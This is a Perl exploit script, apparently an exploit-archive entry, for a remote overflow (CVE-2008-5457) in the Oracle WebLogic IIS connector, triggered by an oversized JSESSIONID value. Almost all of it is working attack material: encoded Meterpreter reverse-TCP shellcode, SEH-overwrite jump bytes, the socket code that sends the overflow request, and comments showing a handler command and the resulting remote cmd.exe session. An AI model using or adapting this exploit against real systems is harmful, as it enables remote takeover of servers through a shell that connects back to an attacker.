Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

#!/usr/bin/perl # No point in keeping this private anymore! # # k`sOSe - 02/16/2009 - CVE-2008-5457 # Tested on w2k sp4 and w2k3 R2 sp2 (no NX) # # cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E # [*] Please wait while we load the module tree... # [*] Handler binding to LHOST 0.0.0.0 # [*] Started reverse handler # [*] Starting the payload handler... # [*] Transmitting intermediate stager for over-sized stage...(191 bytes) # [*] Sending stage (75776 bytes) # [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171) # # meterpreter > rev2self # meterpreter > execute -i -f cmd.exe # Process 3092 created. # Channel 1 created. # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # c:\\windows\\system32\\inetsrv> # LHOST=10.10.10.1 LPORT=80 # windows/reflectivemeterpreter/reverse_tcp # [*] x86/alpha_mixed succeeded, final size 619 my $shellcode = \"\\xd9\\xec\\xd9\\x74\\x24\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\" . \"\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\" . \"\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\" . \"\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\" . \"\\x75\\x4a\\x49\\x4b\\x4c\\x4b\\x58\\x46\\x36\\x45\\x50\\x45\\x50\\x43\" . \"\\x30\\x50\\x53\\x46\\x35\\x51\\x46\\x51\\x47\\x4c\\x4b\\x42\\x4c\\x47\" . \"\\x54\\x44\\x58\\x4c\\x4b\\x50\\x45\\x47\\x4c\\x4c\\x4b\\x51\\x44\\x43\" . \"\\x35\\x44\\x38\\x45\\x51\\x4b\\x5a\\x4c\\x4b\\x50\\x4a\\x45\\x48\\x4c\" . \"\\x4b\\x51\\x4a\\x47\\x50\\x43\\x31\\x4a\\x4b\\x4b\\x53\\x50\\x32\\x51\" . \"\\x59\\x4c\\x4b\\x47\\x44\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x50\\x31\\x4b\" . \"\\x4f\\x4b\\x4c\\x50\\x31\\x49\\x50\\x4e\\x4c\\x47\\x48\\x4d\\x30\\x43\" . \"\\x44\\x44\\x47\\x49\\x51\\x48\\x4f\\x44\\x4d\\x43\\x31\\x49\\x57\\x4a\" . \"\\x4b\\x4b\\x42\\x47\\x4b\\x43\\x4c\\x47\\x54\\x42\\x34\\x44\\x35\\x4b\" . \"\\x51\\x4c\\x4b\\x51\\x4a\\x47\\x54\\x45\\x51\\x4a\\x4b\\x43\\x56\\x4c\" . \"\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4a\\x45\\x4c\\x45\\x51\\x4a\" . \"\\x4b\\x4c\\x4b\\x43\\x34\\x4c\\x4b\\x45\\x51\\x4a\\x48\\x4a\\x4b\\x43\" . \"\\x32\\x50\\x31\\x49\\x50\\x51\\x4f\\x51\\x4e\\x51\\x4d\\x51\\x4b\\x48\" . \"\\x42\\x45\\x58\\x43\\x30\\x51\\x4e\\x42\\x4a\\x46\\x50\\x51\\x49\\x43\" . \"\\x54\\x4c\\x4b\\x42\\x39\\x4c\\x4b\\x51\\x4b\\x44\\x4c\\x4c\\x4b\\x51\" . \"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x4b\\x4c\\x4b\\x51\\x4b\\x44\\x48\\x51\" . \"\\x43\\x45\\x38\\x4c\\x4e\\x50\\x4e\\x44\\x4e\\x4a\\x4c\\x4b\\x4f\\x4e\" . \"\\x36\\x4d\\x59\\x48\\x47\\x46\\x33\\x45\\x38\\x46\\x34\\x48\\x4a\\x4e\" . \"\\x4f\\x4c\\x51\\x4b\\x4f\\x49\\x46\\x4d\\x51\\x4a\\x4c\\x45\\x50\\x43\" . \"\\x31\\x43\\x30\\x45\\x50\\x50\\x50\\x46\\x37\\x46\\x36\\x51\\x43\\x4d\" . \"\\x59\\x4d\\x35\\x4d\\x38\\x45\\x4f\\x43\\x30\\x45\\x50\\x43\\x30\\x4a\" . \"\\x30\\x43\\x31\\x43\\x30\\x45\\x50\\x48\\x36\\x45\\x49\\x42\\x38\\x4d\" . \"\\x37\\x49\\x34\\x42\\x39\\x42\\x50\\x4d\\x39\\x4a\\x4c\\x4c\\x39\\x4e\" . \"\\x4a\\x43\\x50\\x48\\x59\\x45\\x59\\x4a\\x55\\x4e\\x4d\\x48\\x4b\\x4a\" . \"\\x4d\\x4b\\x4c\\x47\\x4b\\x51\\x47\\x50\\x53\\x46\\x52\\x51\\x4f\\x46\" . \"\\x53\\x46\\x52\\x45\\x50\\x51\\x4b\\x4c\\x4d\\x50\\x4b\\x42\\x38\\x46\" . \"\\x31\\x4b\\x4f\\x48\\x57\\x4b\\x39\\x49\\x4f\\x4b\\x39\\x48\\x43\\x4c\" . \"\\x4d\\x44\\x35\\x44\\x54\\x43\\x5a\\x45\\x55\\x50\\x59\\x46\\x31\\x46\" . \"\\x33\\x4b\\x4f\\x46\\x54\\x4c\\x4f\\x4b\\x4f\\x50\\x55\\x44\\x44\\x51\" . \"\\x49\\x4c\\x49\\x44\\x44\\x4c\\x4e\\x4b\\x52\\x4b\\x42\\x46\\x4b\\x47\" . \"\\x57\\x50\\x54\\x4b\\x4f\\x50\\x37\\x4b\\x4f\\x46\\x35\\x51\\x38\\x46\" . \"\\x51\\x49\\x50\\x50\\x50\\x46\\x30\\x46\\x30\\x46\\x30\\x47\\x30\\x46\" . \"\\x30\\x47\\x30\\x50\\x50\\x4b\\x4f\\x51\\x45\\x51\\x34\\x4b\\x39\\x48\" . \"\\x47\\x45\\x38\\x44\\x4a\\x45\\x5a\\x44\\x4a\\x45\\x51\\x43\\x58\\x44\" . \"\\x42\\x45\\x50\\x45\\x50\\x46\\x30\\x4b\\x39\\x4d\\x31\\x43\\x5a\\x42\" . \"\\x30\\x46\\x31\\x51\\x47\\x4b\\x4f\\x50\\x55\\x51\\x30\\x43\\x5a\\x51\" . \"\\x50\\x51\\x4e\\x46\\x36\\x49\\x51\\x4a\\x46\\x45\\x56\\x51\\x46\\x49\" . \"\\x51\\x4a\\x46\\x44\\x48\\x46\\x36\\x43\\x5a\\x45\\x50\\x4b\\x4f\\x46\" . \"\\x35\\x44\\x4c\\x4d\\x59\\x49\\x53\\x42\\x4a\\x43\\x30\\x50\\x56\\x51\" . \"\\x43\\x50\\x57\\x4b\\x4f\\x46\\x35\\x44\\x58\\x4b\\x4f\\x48\\x53\\x44\" . \"\\x4a\\x41\\x41\"; use warnings; use strict; use IO::Socket::INET; my $sock = IO::Socket::INET->new(PeerAddr => \'10.10.10.4\', PeerPort => \'80\', Proto => \'tcp\'); print $sock \"POST /index.jsp?;JSESSIONID=\" . \"B\" x 5132 . $shellcode . \"C\" x (3000-length($shellcode)) . \"\\xe9\\x43\\xf4\\xff\\xff\" . # jmp back \"\\x90\\x90\\xeb\\xf7\" . # jmp back \"\\x76\\x79\" . # SEH partial rewrite \" HTTP/1.0\\r\\n\" . \"Connection:Keep-Alive\\r\\n\" . \"Content-Length: 81\\r\\n\\r\\n\" . \"A\" x 81 . \"\\r\\n\";